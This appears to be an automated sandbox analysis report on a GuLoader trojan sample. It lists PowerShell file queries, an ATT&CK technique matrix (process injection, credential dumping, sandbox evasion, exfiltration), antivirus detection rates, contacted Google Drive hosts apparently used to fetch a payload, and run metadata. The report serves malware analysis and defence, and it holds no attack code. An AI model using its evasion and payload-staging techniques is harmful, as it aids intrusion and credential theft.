      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00405D68 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405D68
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      311
      Process Injection
      1
      Masquerading
      OS Credential Dumping111
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      31
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      Logon Script (Windows)Logon Script (Windows)311
      Process Injection
      Security Account Manager31
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials14
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      ro7eoySJ9q.exe61%ReversingLabsWin32.Trojan.Guloader
      ro7eoySJ9q.exe72%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe61%ReversingLabsWin32.Trojan.Guloader
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://crl.microsoft%0%Avira URL Cloudsafe
      http://crl.microU0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      216.58.206.78
      truefalse
        high
        drive.usercontent.google.com
        142.250.181.225
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://drive.google.com/usermsiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://drive.usercontent.google.com/3xmsiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.00000000099ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3242165243.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321303005.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3219456047.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3393116568.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3196008939.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310503672.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3150159318.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3173324626.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310607658.0000000009A61000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.microsoftpowershell.exe, 00000002.00000002.2822656298.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://drive.google.com/4v%msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://nsis.sf.net/NSIS_ErrorErrorro7eoySJ9q.exe, 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ro7eoySJ9q.exe, 00000000.00000000.2146201166.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                      high
                                      http://crl.microUpowershell.exe, 00000002.00000002.2822656298.00000000077C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://drive.google.com/dvmsiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.commsiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.microsoft%powershell.exe, 00000002.00000002.2822656298.00000000077C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://drive.google.com/lifornia1msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.google.com/nymsiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2816419859.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.google.com/msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/Umsiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.google.com/tvmsiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://apis.google.commsiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2816419859.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.google.com/emsiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    142.250.181.225
                                                                    drive.usercontent.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    216.58.206.78
                                                                    drive.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1588610
                                                                    Start date and time:2025-01-11 03:06:35 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 50s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:9
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:ro7eoySJ9q.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423.exe
                                                                    Detection:MAL
                                                                    Classification:mal96.troj.evad.winEXE@6/15@2/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 33.3%
                                                                    HCA Information:
                                                                    • Successful, ratio: 89%
                                                                    • Number of executed functions: 85
                                                                    • Number of non-executed functions: 29
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
